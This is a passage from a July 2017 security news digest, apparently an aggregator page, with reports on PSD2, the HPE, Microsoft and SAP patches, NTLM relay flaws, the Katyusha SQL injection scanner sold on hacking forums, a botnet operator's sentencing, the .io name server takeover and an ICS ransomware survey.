“There’s no putting the Let’s Encrypt genie back in the bottle, but this means every organization could be a victimized by malicious websites designed to spoof their customers and partners,” Bocek added. “This means every organization must monitor the internet for malicious certificates. Google’s Certificate Transparency initiative and other similar technologies allow organizations to spot fake or malicious certificates regardless of the CA.”


PSD2 and Open Banking Bring Problems and Opportunities for Global Banks

12.7.2017 securityweek Security

Global Banks Should Not Ignore Europe's Payment Services Directive 2 (PSD2)

Payment Services Directive 2 (PSD2) is a new EU banking/finance regulation coming into force in January 2018. It is designed to shake up the finance sector -- perhaps even designed to weaken the overall strength of the banks following the 2008 crash. While being European in origin, American and other global banks should not -- and perhaps cannot -- ignore it.

The banks are considered to be too powerful and monolithic with sole and complete ownership of their customers financial data. The European bureaucrats want to introduce some competition. Their chosen route is to force the banks to provide APIs that will allow third-party apps to access customer data and provide new services not currently offered by the banks. The bureaucrats then believe third-parties will re-invigorate the payments and finance markets for end users.

There are enormous difficulties for the banks -- for while they are required to give third-party access to customer data, they will remain liable for the security of that data under the General Data Protection Regulation (GDPR).

Consider if this is done via a social media organization. That organization will build an app that provides access to, and uses, its customers' financial data. The banks can authenticate the social media organization; but the social media app authenticates the user. It is possible, then, that access to customer financial data will be controlled only by social media logon; and that will almost certainly be less secure than the multi-factor and behavioral security measures that many banks currently use.

But where there are problems, there are also opportunities. The banks that provide effective and efficient APIs could attract new customers from banks that provide poor APIs, all coming from the quality of the third-party apps that use those APIs. As Steve Kirsch, CEO at Token, told SecurityWeek, "In general, when you see a new unstoppable trend, the biggest winners are generally the earliest adopters."

There are two reasons for American banks (and other global banks) to conform to this new European regulation. Firstly, American banks with a European operation will be required to do so. Secondly, European banks with an American operation will bring their APIs with them. Since the customer will be the biggest winner in this new world of open banking, American banks not offering a similar service will be at a disadvantage. "American banks should be rushing to implement open banking on their own," says Kirsch. "It is a major step forward for banking."

The GSM Association (GSMA: the trade body that represents mobile operators with more than 1000 full and associate members) agrees that US banks should get involved. "It should not take a law for American banks to take up PSD2 principles," Marta Ienco, head of government and regulatory affairs at GSMA Personal Data, told SecurityWeek. "Instilling consumer confidence that money is safe, with fewer clunky security measures, will mean more customers want to use their service and trust the company."

GSMA believes that mobile banking is inherently secure. "Operators can leverage user data such as location, account and usage history, which in turn can be used to help verify transactions. Moreover," added Ienco, "this rich data can also help minimize instances of account takeover fraud. So, if someone tries to change the mobile number associated with a bank account, the operator can determine if the original mobile number is still in use, and use it to alert the customer to any suspicious changes to their personal details."

Like many regulations, PSD2 describes what must be done, but not how it can be achieved. This leads to difficulties for both the third-party app developers, and for the banks themselves.

For the developers, it does mandate 2FA; but that is about all. While there are some de facto API standards, such as REST and OAUTH, there are is no standard for the PSD2 banking APIs. "The APIs for different banks could all be completely different in how they work, how their authentication is achieved, and so on," explains Andrew Whaley, VP of engineering at Arxan Technologies. "The practical problems for an organization trying to consume these APIs (such as a social media organization, or whatever) means that the third-party potentially has to build a different adapter for every different bank."

For the banks, one difficulty will be in maintaining their own strict authentication requirements. "PSD2 is clear that the banks are still responsible for the customer data ownership, and the safety of the data," explains Whaley. "So, if the third party gets hold of the data, and its access controls are not particularly strong and someone else gets hold of the data, accidentally or deliberately, the bank is still liable for the third party's failure. The only way the banks can counter this is to bring the technology and countermeasures they already have in their own apps to bear in this space and force their own authentication standards through the API so that they have direct communication with the customer before the third-party can get access to the data."

GSMA agrees that the banks are caught between PSD2 and GDPR. "If banks aren't completely certain of the provenance of a request, and decline a request from a service provider, they could be in violation of PSD2. But if a data breach then takes place, they could also become liable under the rules of GDPR, also coming into effect next year."

PSD2 is a done deal and will come into effect in January 2018. European banks cannot avoid it, and American banks with a European presence (that is, European customers) will need to comply for those European customers. However, the global nature of big bank operations means that PSD2 APIs will inevitably come into play in the US. When that happens, US banks unable to take part in the new world of open banking will be at a distinct disadvantage to those that can.


HPE Addresses Vulnerabilities in Several Products

12.7.2017 securityweek Vulnerebility

Hewlett Packard Enterprise (HPE) has informed customers of security bypass, information disclosure, remote code execution, cross-site scripting (XSS) and URL redirection vulnerabilities in several of its products. Advisories for each of the affected products were published this week on the Full Disclosure mailing list.

According to the company, the Samba component of HPE NonStop Server is affected by access restriction bypass (CVE-2017-2619) and remote code execution flaws (CVE-2017-7494). The latter is also known as EternalRed and SambaCry, and it has already been exploited in the wild to deliver malware. The vulnerability affects the products of several major software vendors.

HPE has not released patches for the Samba bugs, but it has provided some workarounds that can be used to prevent potential attacks. The security holes affect Samba on NonStop T1201L01 through T1201L01^AAL, and T1201H01 through T1201H01^AAM. Fixes will be included in the upcoming T1201L01^AAO and T1201H01^AAN versions.

The company also informed customers that it has rolled out patches for security bypass, XSS and URL redirection vulnerabilities affecting the HPE Network Node Manager i (NNMi) software.

The flaws, collectively tracked as CVE-2017-8948 with a severity rating of “critical,” can be exploited remotely. The security holes affect versions 10.0x, 10.1x and 10.2x, and patches have been made available for each of them.

The HPE SiteScope application monitoring software is affected by four vulnerabilities, including remote code execution and security restrictions bypass flaws rated “high severity.” The other two weaknesses affecting SiteScope are encryption-related issues that can lead to the disclosure of sensitive information.

The security holes affect versions 11.2x and 11.3x, and they have been addressed with the release of security updates and mitigations.

The SiteScope vulnerabilities were disclosed last month by CERT/CC and researcher Richard Kelley after the discovery of hundreds of potentially vulnerable installations on the Internet. At the time, HPE promised to release patches for the more serious flaws in the third quarter and pointed out that the encryption bugs are covered in the product’s deployment guide.

An updated advisory – initially released in mid-May – has also been published by HPE on the Full Disclosure mailing list this week. The advisory informs users of five critical and high severity remote code execution vulnerabilities affecting the HPE Intelligent Management Center (iMC) network management platform.


Critical Flaws Found in Windows NTLM Security Protocol – Patch Now
12.7.2017 thehackernews
Vulnerebility

As part of this month's Patch Tuesday, Microsoft has released security patches for a serious privilege escalation vulnerability which affect all versions of its Windows operating system for enterprises released since 2007.
Researchers at behavioral firewall specialist Preempt discovered two zero-day vulnerabilities in Windows NTLM security protocols, both of which allow attackers to create a new domain administrator account and get control of the entire domain.
NT LAN Manager (NTLM) is an old authentication protocol used on networks that include systems running the Windows operating system and stand-alone systems.
Although NTLM was replaced by Kerberos in Windows 2000 that adds greater security to systems on a network, NTLM is still supported by Microsoft and continues to be used widely.
The first vulnerability involves unprotected Lightweight Directory Access Protocol (LDAP) from NTLM relay, and the second impact Remote Desktop Protocol (RDP) Restricted-Admin mode.
LDAP fails to adequately protect against NTLM relay attacks, even when it has built-in LDAP signing the defensive measure, which only protects from man-in-the-middle (MitM) attacks and not from credential forwarding at all.
The vulnerability could allow an attacker with SYSTEM privileges on a target system to use incoming NTLM sessions and perform the LDAP operations, like updating domain objects, on behalf of the NTLM user.
"To realize how severe this issue is, we need to realize all Windows protocols use the Windows Authentication API (SSPI) which allows downgrade of an authentication session to NTLM," Yaron Zinar from Preempt said in a blog post, detailing the vulnerability.
"As a result, every connection to an infected machine (SMB, WMI, SQL, HTTP) with a domain admin would result in the attacker creating a domain admin account and getting full control over the attacked network."
Video Demonstration of Relay Attack
Preempt researchers also provided a video to demonstrate credential relay attacks.

 

The second NTLM vulnerability affects Remote Desktop Protocol Restricted-Admin mode – this RDP Restricted-Admin mode allows users to connect to a remote computer without giving their password.
According to Preempt researchers, RDP Restricted-Admin allows authentication systems to downgrade to NTLM. This means the attacks performed with NTLM, such as credential relaying and password cracking, could also be carried out against RDP Restricted-Admin.
When combined with the LDAP relay vulnerability, an attacker could create a fake domain admin account whenever an admin connects with RDP Restricted-Admin and get control of the entire domain.
The researchers discovered and privately reported LDAP and RDP Relay vulnerabilities in NTLM to Microsoft in April.
However, Microsoft acknowledged the NTLM LDAP vulnerability in May, assigning it CVE-2017-8563, but dismissed the RDP bug, claiming it is a "known issue" and recommending configuring a network to be safe from any NTLM relay.
"In a remote attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to send malicious traffic to a domain controller. An attacker who successfully exploited this vulnerability could run processes in an elevated context," Microsoft explained in its advisory.
"The update addresses this vulnerability by incorporating enhancements to authentication protocols designed to mitigate authentication attacks. It revolves around the concept of channel binding information."
So, sysadmins are recommended to patch their vulnerable servers with NT LAN Manager enabled as soon as possible.
You can either consider turning NT LAN Manager off or require that incoming LDAP and SMB packets are digitally signed in order to prevent credential relay attacks.
Besides this NTLM relay flaw, Microsoft has released patches for 55 security vulnerabilities, which includes 19 critical, in several of its products, including Edge, Internet Explorer, Windows, Office and Office Services and Web Apps, .NET Framework, and Exchange Server.
Windows users are strongly advised to install the latest updates as soon as possible in order to protect themselves against the active attacks in the wild.


Microsoft Patches Over 50 Vulnerabilities

12.7.2017 securityweek Vulnerebility

Microsoft has patched more than 50 vulnerabilities in its products, including Windows, Internet Explorer, Edge, Office, SharePoint, .NET, Exchange and HoloLens. While some of them have already been disclosed, the tech giant is not aware of any malicious attacks exploiting these flaws.

One of the weaknesses whose details have already been publicly disclosed is CVE-2017-8584, a critical remote code execution vulnerability affecting HoloLens, Microsoft’s mixed reality headset.

The security hole, caused due to how HoloLens handles objects in memory, can be exploited by sending specially crafted Wi-Fi packets to a device. Successful exploitation can allow the attacker to take control of the targeted system.

This is just one of the 19 vulnerabilities rated critical. The list also includes remote code execution vulnerabilities in Windows Search, Windows Explorer, Internet Explorer and the scripting engines used by Microsoft’s web browsers.

The Windows Search flaw (CVE-2017-8589) can be exploited by sending a specially crafted message to this service, which can allow a hacker to elevate privileges and take control of the device. Microsoft pointed out that in an enterprise environment, a remote attacker can exploit the flaw without authentication using an SMB connection.

Other flaws that have already been disclosed are CVE-2017-8587, a Windows denial-of-service (DoS) issue, and CVE-2017-8611 and CVE-2017-8602, both of which are spoofing vulnerabilities affecting web browsers.

Renato Marinho, director of research at Morphus Labs, believes there are also some “important” vulnerabilities worth mentioning. This includes privilege escalation bugs related to the Windows Common Log File System (CLFS) driver and the NT LAN Manager (NTLM) Authentication Protocol, a PowerShell remote code execution flaw, a Kerberos SNAME security feature bypass, and a remote code execution weakness affecting WordPad.

Trend Micro’s Zero Day Initiative (ZDI) pointed out that with the July 2017 Patch Tuesday fixes, Microsoft has addressed all the vulnerabilities disclosed at this year’s Pwn2Own hacking competition.

Microsoft has also updated the Flash Player libraries used by its products – Adobe patched three vulnerabilities on Tuesday with the release of version 26.0.0.137.


Katyusha Scanner — Telegram-based Fully Automated SQL Injection Tool
12.7.2017 thehackernews  Safety

A new powerful hacking tool recently introduced in an underground forum is making rounds these days, allowing anyone to rapidly conduct website scans for SQL injection flaws on a massive scale — all controlled from a smartphone using the Telegram messaging application.
Dubbed Katyusha Scanner, the fully automated powerful SQLi vulnerability scanner was first surfaced in April this year when a Russian-speaking individual published it on a popular hacking forum.
Researchers at Recorded Future's Insikt Group threat intelligence division found this tool for sale on an underground hacking forum for just $500. Users can even rent the Katyusha Scanner tool for $200.
According to the researchers, Katyusha Scanner is a web-based tool that's a combination of Arachni Scanner and a basic SQL Injection exploitation tool that allows users to automatically identify SQLi vulnerable sites and then exploits it to take over its databases.
Arachni is an open source vulnerability scanning tool aimed towards helping users evaluate the security of their web applications.
What makes this tool stand out of line is its 'Infrastructure-as-a-Service' model.
Remotely Control Hacking Tool Via Telegram

Katyusha Scanner is abusing the Telegram messaging application to control its operations, such as sending and receiving commands.
The Katyusha Scanner tool is quite easy to setup and use, allowing anyone to conduct large-scale penetration attacks against a large number of targeted websites simultaneously with the mere use of their smartphones.
The Pro version of the tool not just identifies vulnerable websites, but also allows hackers to establish a "strong foothold within vulnerable web servers" and automatically extract "privileged information such as login credentials."
Once the scan is complete, Katyusha Scanner sends a text message to the criminals with the vulnerable site name, its Alexa web ratings, helping criminals identify popular websites that would likely be more profitable for them to attack, and the number of databases.
The criminals, even with no technical knowledge, can download any exfiltrated data available by just clicking on their smartphones to issue commands.
Katyusha Scanner also allows for the automatic dumping of databases and can be used on both Linux as well as Windows machines.
"The availability of a highly robust and inexpensive tool...Katyusha Scanner to online criminals with limited technical skills will only intensify the compromised data problem experienced by various businesses, highlighting the importance of regular infrastructure security audits," researchers at Recorded Future wrote.
Many buyers praised the quality of the tool on the black market site, one of the satisfied customers who got immediate success in obtaining access to eight web servers wrote:
"Excellent support! The seller has configured the software for my server, which was failing before, however, right now it flies divinely! I highly recommend the software, and it has found eight SQL vulnerabilities in half a day, great automation of the routine. Very grateful to the seller."
Another wrote: "The author has helped with the product setup after the purchase, and (Katyusha) has immediately found SQL vulnerability. Thank you for the great product."
Initially, Katyusha Scanner was sold for $500, but due to unexpectedly high demand, a light version of the tool with slightly limited functionality was released on May 10, 2017, at just $250.
With the release of the most recent Katyusha 0.8 Pro update at the end of June, the author also made the scanner available for rent at $200 per month for the first time.


Katyusha Scanner, a new SQLi Vulnerability Scanner Available for $500 in the underground
12.7.2017 securityaffairs IT

Katyusha Scanner is a new fully automated SQLi vulnerability scanner discovered by researchers at security firm Recorded.
Recorded Future security researchers have discovered a fully automated SQLi vulnerability scanner, dubbed Katyusha Scanner, on a hacking forum. The tool is offered for sale for just $500, it allows mass scans, simply managed from a smartphone through the Telegram messenger. The company, of course, reported the discovered to law enforcement.

The Katyusha Scanner appeared in the hacking underground in early April. It was developed starting from the Anarchi Scanner open source penetration testing tool and according to the researchers, it has already been updated seven times since its introduction

Actually, the Katyusha Scanner is offered under a Pro and a Lite version that go for between $250 and $500.

The Pro version leverages known exploits to hack into the system, once a SQL injection bug is found the tool notify it to the attacker via a text message that includes the site name, Alexa rating, and the number of available databases.

“On April 8, 2017, a Russian-speaking member of a top-tier hacking forum introduced “Katyusha Scanner,” the powerful and fully automated SQLi vulnerability scanner that utilizes the functionality of Telegram messenger and Anarchi Scanner, an open-source penetration testing tool.” states the blog post published by RecorderFuture.

The released product, coupled with outstanding support and frequent updates, immediately gained popularity and accolades of grateful clients for an intuitive and straightforward interface, as well as incredible performance.”

katyusha scanner analysis 2Katyusha scanner

Researchers at Recorded Future reported that the seller is Russian speaking and is known in the hacking underground for selling data stolen from e-commerce websites. According to the experts, the forum where the tool is commercialized is frequented by top-tier Russian hackers.

An innovative feature implemented in the Katyusha Scanner allows crooks to upload a list of target websites and launch the concurrent attack against them simultaneously, seamlessly controlling the attack via Telegram.

The scanner is easy to use, the attackers only need set up a standard web server with the version of the Anarchi scanner that has been modified to allow the control of the operation through a linked Telegram account.

The attackers can control the attack using almost every mobile OS.

“Interestingly, the name Katyusha was not chosen by chance — it represents an iconic multiple rocket launcher, developed by the Soviet Union during World War II known for inflicting panic in Nazi forces with its stealthy and devastating attacks. Similar to the very lethal weapon conceived 70 years ago, Katyusha Scanner allows criminals to initiate large-scale penetration attacks against a massive number of targeted websites with several clicks using their smartphones.” continues the analysis.

The seller suggests starting with at least 500 target sites, attackers can issue commands to scan them for any known vulnerabilities. The Pro version also implements the capability of downloading any exfiltrated data available.

According to Recorded Future, at least 12/15 user have already purchased the tool, they were satisfied for the efficiency of the tool.

The potential scale of the attacks that the tool is able to power is worrisome.

“When dozens buy it and initiate attacks every day, the potential fallout will be significant,” Recorded Future director of advanced collection Andrei Barysevich said. “The scale of attacks which is available to criminals is quite unprecedented now. And the convenience of this; someone who wants to engage in this type of activity doesn’t have to be a hacker, he doesn’t have to know how certain tools operate or what exploit packs they should be using. The tool will do everything for them.”


SAP Addresses High Severity Vulnerabilities With July 2017 Patches

12.7.2017 securityweek  Vulnerebility

SAP today announced that a total of 12 Security Notes were included in its July 2017 Security Patch Day, including four notes that address high severity vulnerabilities.

Of the 12 Security Notes, 2 were updates to previously released Patch Day Security Notes, the German software maker reveals. Cross-Site Scripting and Information Disclosure bugs were the most common types of isses addressed.

Additionally, SAP released 11 Support Package Notes, for a total of 23 Security Notes. Overall, 11 of the Notes were released after June 13, but before July 11. Of the 23 Notes, 5 were updates to previously released Security Notes, ERPScan reveals.

The most severe of the addressed vulnerabilities involved Missing authorization checks in SAP Point of Sale (POS) Retail Xpress Server. With a CVSS score of 8.1, the bug could be exploited to read, write, or delete files stored on SAP POS server; shutdown the Xpress Server application; and monitor all content displayed on a receipt window of a POS.

“An attacker can use a Missing authorization check vulnerability to access a service without any authorization procedure and use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation, and other attacks,” ERPScan explains.

Another High severity bug was a Missing authorization check vulnerability in SAP Host Agent. With a CVSS score of 7.5, the issue “could allow an attacker to remotely restart SAP Host Agent without authentication, through a specific crafted SOAP request,” security firm Onapsis reveals.

The company explains that all SAP Host Agent versions up to 7.21 PL24 are affected, including all Netweaver-based applications and HANA 1 and HANA 2. The issue was resolved in SAP Host Agent version 7.21 PL25. SAP HANA users should upgrade to Revision 122.10 (for SAP HANA1.00 SPS12), Revision 2.02 (for SAP HANA2.0 SPS00), or Revision 12 (for SAP HANA2.0 SPS01).

The remaining High priority security notes include: Improved security for outgoing HTTPS connections in SAP NetWeaver, with a CVSS score of 7.4; and Missing authorization-check in BC-SRV-ALV, with a CVSS score of 6.0. Both are updates to previously released security notes.

Other dangerous vulnerabilities addressed this month in SAP products include a Code injection vulnerability (CVSS Base Score: 6.5) in SAP Governance, Risk and Compliance Access Controls (GRC); Cross-site scripting and Cross-site request forgery (CVSS Base Score: 6.1) in SAP CRM Internet Sales Administration Console; an XML external entity vulnerability (CVSS Base Score: 6.1) in SAP BI Promotion Management Application; and an XML external entity vulnerability (CVSS Base Score: 5.4) in SAP Business Objects Titan.

“This month only 43% of notes require no manual steps besides note installation. Installing these notes is easier than the other ones and patching them has direct impact on information security. This percentage is lower than the average (usually between 60% and 75%) so this means this month’s users should perform more manual steps to have better coverage of patches in their environments,” Onapsis explains.


Symantec to Acquire Mobile Security Firm Skycure

12.7.2017 securityweek  IT

Just three days after announcing that it would acquire Fireglass, Symantec announced that it has agreed to acquire mobile security firm Skycure.

Founded in 2012 by two former members of Israel Defense Forces' Unit 8200, Skycure has raised a total of $27.5 million in funding to date, and offers a threat prevention platform aimed at protecting mobile devices by monitoring network traffic behavior and fixing suspicious activity.

Symantec said that Skycure’s technology would be combined with its Integrated Cyber Defense Platform, giving Symantec customers “access to comprehensive and effective endpoint protection offerings across traditional and mobile devices, with enhanced capabilities for mobile devices, applications, network gateways and data protection."

Symantec also said that gaining access to Skycure’s technology will help position the company to serve as a strategic partner for telecommunications companies looking to build out mobile security offerings for their end users.

While no financial terms were disclosed, analysts from investment firm Jefferies estimate the acquisition cost to be roughly $200 million.

“While it's logical for [Symantec] to expand further into this market for a complete endpoint (desktop + server + mobile) offering, we note that it has been difficult to monetize mobile,” Jefferies wrote in a research note Tuesday. “Additionally, while we believe the go-to-market strategy to partner with telcos is logical, we note that it is likely at a substantially lower ASP than the direct channel. Therefore, we continue to believe that even traction gained within the telco channel may not be a meaningful contributor to revenue given greater go-to-market efficiency (i.e., lower price points).”

Jefferies also commented on the acquisition of Fireglass, calling it a “smart offensive and defensive move.”

“We saw the acquisition of Fireglass as a smart offensive and defensive move, as its browser isolation technology can be used to enter a new and potentially high-growth market, while defending the Symantec proxy solutions from any potential threat this market could pose,” the note added.

According to Symantec CEO Greg Clark, the company believes the future is “mobile-first” and requires protection that single platform vendors will struggle to provide on their own. “Our investments in this area will bring defense-in-depth across platforms including, closed operating systems,” Clark said in a statement.

“We believe the Skycure acquisition is logical given an increasingly mobile-first world, but believe that the return on this investment is incrementally less obvious given ongoing challenges to monetize mobile security,” Jefferies analysts opined.


Russian Financial Cybercriminal Gets Over 9 Years In U.S. Prison
11.7.2017 thehackernews CyberCrime
A 29-year-old Russian-born, Los Angeles resident has been sentenced to over nine years in prison for running botnets of half a million computers and stealing and trafficking tens of thousands of credit card numbers on exclusive Russian-speaking cybercriminal forums.
Alexander Tverdokhlebov was arrested in February, pleaded guilty on March 31 to wire fraud and on Monday, a federal court sentenced him to 110 months in prison.
According to court documents, Tverdokhlebov was an active member of several highly exclusive Russian-speaking cybercriminal forums largely engaged in money laundering services, selling stolen sensitive data, and malware tools since at least 2008.
Tverdokhlebov offered several illegal services on these underground forums, including the exchange of tools, services and stolen personal and financial information.
The hacker also operated several botnets – a network of compromised ordinary home and office computers that are controlled by hackers and can be used to steal credit card and other sensitive financial information.
At various occasions between 2009 and 2013, Tverdokhlebov claimed on the underground forums that "he possessed 40,000 stolen credit card numbers and could control up to 500,000 infected computers."
Tverdokhlebov emigrated from Russia in 2007 and later obtained United States citizenship. He also hired two Russian students studying in the America to cash out funds from a compromised bank account.
At the time of his arrest in February, federal authorities seized approximately $5 million in Bitcoin and $272,000 in cash from Tverdokhlebov, while he was trying to steal money from thousands of online US bank accounts.
According to the prosecutors, Tverdokhlebov stole sensitive financial information from at least 100 victims, estimating losses totaled between $9.5 Million to $25 Million.
"As part of the sentencing, the court also ordered the defendant to serve three years of supervised release following his prison term, with conditions of release that will include monitoring of the defendant's computer use," the Department of Justice said.
Most of his family is still based in Russia, and the only significant tie he has in the United States is a relationship with a Russian-born woman based there. Tverdokhlebov also married an American citizen in 2009 but divorced her shortly.


SQLi Vulnerability Scanner Available on Hacking Forum at $500

11.7.2017 securityweek  Safety
A fully automated SQLi vulnerability scanner is available for purchase on a hacking forum for just $500, Recorded Future security researchers have discovered.

Dubbed Katyusha Scanner, the powerful tool was posted on a popular hacking forum by a Russian-speaking individual, on April 8, 2017. The scanner takes advantage of the functionality of Telegram messenger, as well as of Anarchi Scanner, an open-source penetration testing tool, the security researchers reveal.

The application has already received numerous updates, the last of them introduced on June 26, 2017, as Katyusha 0.8 Pro. Because of “outstanding support” from its author, the scanner immediately gained popularity among users, and started being praised for its intuitive and straightforward interface, and for performance capabilities.

Not only does the scanner allow miscreants to control the hacking process using a standard web interface, but it also provides users with the possibility to “upload a list of websites of interest and launch the concurrent attack against several targets simultaneously,” the researchers say. The operation can be seamlessly controlled via Telegram messenger.

Apparently, the scanner’s name specifically reflects this capability, making reference to the multiple-rocket launcher developed by the Soviet Union during World War II.

“Similar to the very lethal weapon conceived 70 years ago, Katyusha Scanner allows criminals to initiate large-scale penetration attacks against a massive number of targeted websites with several clicks using their smartphones,” Recorded Future explains.

Katyusha Scanner was made available at $500, with a light version released on May 10, 2017 at $250. The latter variant has slightly limited functionality, but was introduced due to the high demand the original scanner registered. Along with the Katyusha 0.8 Pro update at the end of June, the author also made the tool available for rent at $200 per month.

Recorded Future researchers warn that “the Pro version offers significantly more robust functionality, not only capable of identification but also establishing a strong foothold within vulnerable web servers and an automatic extraction of privileged information such as login credentials.”

Once the scan has been completed, the tool can display the Alexa web rating for each identified target, providing cybercriminals with “immediate visibility into the popularity of the resource and possible profit level in the future.”

The scanner can search and export email/password credentials, is multi-threaded (with support for concurrent sessions), and offers a module framework, Telegram messenger interface, and web interface. Furthermore, it allows for automatic dumping of databases, supports SQLMAP reports and file upload (the list of targeted websites), and can be used on both Linux and Windows.

The web shell module features CMS family identification (Bitrix, WordPress, OpenCart, etc.), login credentials brute-forcing (concurrent with SQLi scan), and automatic web shell upload.

Available scanning options include SQL injection (sql_injection) — Error-based detection (Oracle, InterBase, PostgreSQL, MySQL, MSSQL, EMC, SQLite, DB2, Informix, Firebird, SaP Max DB, Sybase, Frontbase, Ingres, HSQLDB, MS Access), Blind SQL injection using differential analysis (sql_injection_differential), and Blind SQL injection using timing attacks (sql_injection_timing – MySQL, PostgreSQL, and MSSQL).

“Despite the fact that SQLi attacks have been around for over 20 years, we are still seeing them successfully being used as common attack vectors by online criminals The availability of a highly robust and inexpensive tool such as Katyusha Scanner to online criminals with limited technical skills will only intensify the compromised data problem experienced by various businesses, highlighting the importance of regular infrastructure security audits,” Recorded Future concludes.


Researcher Takes Over .IO Domains by Registering Name Servers

11.7.2017 securityweek  IT

A security researcher could have taken over thousands of .IO domains after being able to register four domain names of the top level domain (TLD)’s authoritative name servers.

The incident happened last month, when researcher Matthew Bryant was “graphing out the DNS delegation paths of various TLDs.” During his project, he discovered a name server domain that was available for registration and was able to purchase it.

".IO" is the country code top level domain (ccTLD) assigned to the British Indian Ocean Territory.

TLDs have authoritative name servers at arbitrary domain names but, by exploiting errors such as misconfiguration, expiration, or other issues, it is possible to “register a name server domain name and use it to serve new DNS records for the entire TLD zone,” the security researcher explains.

For that, one would have to enumerate all name server hostnames for a given extension and then check for base-domains that expired and are available for registration. In some instances, however, the expired domains would not be available for purchase even if not marked as reserved.

Using this method, the researcher stumbled upon the name server domain of ns-a1.io, which appeared as available for the registration price of 90.00 USD. After successfully purchasing it, Bryant attempted to contact the .io TLD to get the issue fixed, but failed.

As a result, he decided to look for other similar name server domains and found ns-a2.io, ns-a3.io, and ns-a4.io domains available for purchase as well. All four domains are listed as authoritative name servers for the .io TLD, and anyone controlling them could potentially “poison/redirect the DNS for all .io domain names registered,” the researcher explains.

Bryant was eventually able to send an email to the appropriate security contact and was informed the next day that the issue was resolved. The researcher verified that he was not able to re-register these domains, showing that the error was remediated.

“Given the fact that we were able to take over four of the seven authoritative name servers for the .io TLD we would be able to poison/redirect the DNS for all .io domain names registered. Not only that, but since we have control over a majority of the name servers it’s actually more likely that clients will randomly select our hijacked name servers over any of the legitimate name servers even before employing tricks like long TTL responses, etc to further tilt the odds in our favor,” the researcher explains.

He also notes that, because the .io TLD has Domain Name System Security Extensions (DNSSEC) enabled, which adds security by enabling DNS responses to be validated, users should be defended from attackers able to send bad/forged DNS data. However, “DNSSEC support is pretty abysmal and I rarely encounter any support for it unless I specifically set a resolver up that supports it myself,” the researcher also points out.

According to Matt Pounsett, however, while the Backend Registry Operator for the .io TLD clearly made a big mistake by allowing a third-party to register the name servers, the issue “definitely does not constitute the catastrophe implied.” He explains that “the name servers for the .io TLD don't respond with their own NS set in their response,” meaning that attack won’t work as suggested.

The issue with the authoritative name servers was that the .io TLD apparently transitioned last month from the operators of the registry to a third-party already in charge with the backend for other top-level domains. The third-party, Afilias, got hold of three domain name servers, but left the other four available.


ICS Security Pros Increasingly Concerned About Ransomware: Survey

11.7.2017 securityweek  ICS  Ransomware

Many security practitioners in the field of industrial control systems (ICS) believe the level of risk is high, and they are increasingly concerned about ransomware and embedded controllers, according to the SANS Institute’s fourth annual ICS cyber security survey.

ICS security experts from organizations of all sizes told SANS that they believe the top threat vectors are devices that cannot protect themselves, such as embedded controllers (44%), internal threats, including accidents (43%), external threats, such as nation-state actors and hacktivists (40%), and ransomware and other extortion attempts (35%).

Ransomware has made a lot of headlines in the past year and industrial systems are at risk, as demonstrated by both theoretical attack scenarios and in-the-wild threats such as the WannaCry malware. As a result, the number of ICS security experts concerned about ransomware has nearly doubled compared to data from the previous SANS survey.

“Although ransomware primarily infects commercial OS-based systems (e.g., Windows, Linux), the integration of these into ICS environments and the dependence of ICS on devices running these operating systems has extended ransomware’s effectiveness and reach,” SANS said in its report. “Publicly known operational impacts remain few to date but, we expect more to follow, especially given public demonstrations of ransomware targeting ICS/SCADA.”

Recent ICS hacking demonstrations also appear to have contributed to an increasing awareness that embedded controllers and control system applications are at risk – nearly one-quarter of respondents believe controllers are most at risk. On the other hand, many still believe that computers running commercial operating systems are most at risk and have the greatest impact.

Top ICS threat vectors

More than two-thirds of respondents believe the threat to ICS to be high or critical, and nearly half said their budgets for ICS security increased from the fiscal year 2016. Over the next 18 months, 20 percent or more of organizations have allocated budget for performing security assessments or audits of control systems, increase visibility into these systems, increase security awareness training, and implement anomaly and intrusion detection tools.

“Budgets for training and certification of staff responsible for implementing and maintaining security of control systems and control fell considerably, from 34% in 2016 to 26% in 2017. Rather than balancing this with increases in trained staff or outside consultants, budgets for these initiatives decreased, dropping, at 14%, below the top 10 budgetary initiatives,” SANS said. “At a time of increasing exposures and risk factors, this is counterintuitive. Rising threat levels and expanding attack surfaces require skilled professionals to address these risks.”

Of the organizations with more than 10,000 employees, 2.6 percent said they have a budget of more than $10 million for control system security in the fiscal year 2017, and 6 percent said they have a budget ranging between $1 million and $10 million. On the other hand, 2.6 percent of large companies admitted they don’t have a budget for ICS security.

The fact that some organizations have allocated budget for improving visibility is encouraging, considering that when asked if their control systems have been infected or infiltrated, 40 percent of respondents said “not that we know of,” which suggests they may have been breached, but lack visibility into their operational technology (OT) network.

ICS infections

Roughly 12 percent of respondents said their control systems were infected or infiltrated in the past year. While most of them either did not know how many times their systems were breached or said they had only detected such events up to five times, some reported more than 50 incidents.


Microsoft Patch Tuesday – June 2017

11.7.2017 Symantec  Vulnerebility blog 

This month the vendor has patched 94 vulnerabilities, 18 of which are rated Critical.
Hello, welcome to this month's blog on the Microsoft patch release. This month the vendor has patched 94 vulnerabilities, 18 of which are rated Critical.

As always, customers are advised to follow these security best practices:

Install vendor patches as soon as they are available.
Run all software with the least privileges required while still maintaining functionality.
Avoid handling files from unknown or questionable sources.
Never visit sites of unknown or questionable integrity.
Block external access at the network perimeter to all key systems unless specific access is required.
Microsoft's summary of the June 2017 releases can be found here:
https://portal.msrc.microsoft.com/en-us/security-guidance

This month's update covers vulnerabilities in:

Microsoft Internet Explorer
Microsoft Edge
Microsoft Office
Microsoft Hyper-V
Microsoft Uniscribe
Windows Graphics
Microsoft Windows
The following is a breakdown of the issues being addressed this month:

Cumulative Security Update for Microsoft Internet Explorer and Edge

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8496) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8497) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8517) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8520) MS Rating: Critical

